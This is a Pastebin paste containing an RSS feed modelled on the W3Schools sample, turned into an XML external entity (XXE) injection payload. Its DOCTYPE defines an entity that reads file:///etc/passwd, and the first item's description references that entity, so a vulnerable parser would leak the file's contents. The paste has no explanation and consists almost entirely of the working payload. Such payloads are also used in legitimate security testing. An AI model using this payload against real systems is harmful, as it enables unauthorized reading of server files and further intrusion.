Advertisement
Guest User

Untitled

a guest
Sep 17th, 2019
85
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE data [
  2. <!ENTITY file SYSTEM "file:///etc/passwd">
  3. ]>
  4. <rss version="2.0">
  5.  
  6. <channel>
  7. <title>W3Schools Home Page</title>
  8. <link>https://www.w3schools.com</link>
  9. <description>Free web building tutorials</description>
  10. <item>
  11. <title>RSS Tutorial</title>
  12. <link>https://www.w3schools.com/xml/xml_rss.asp</link>
  13. <description>&file;</description>
  14. </item>
  15. <item>
  16. <title>XML Tutorial</title>
  17. <link>https://www.w3schools.com/xml</link>
  18. <description>New XML tutorial on W3Schools</description>
  19. </item>
  20. </channel>
  21.  
  22. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement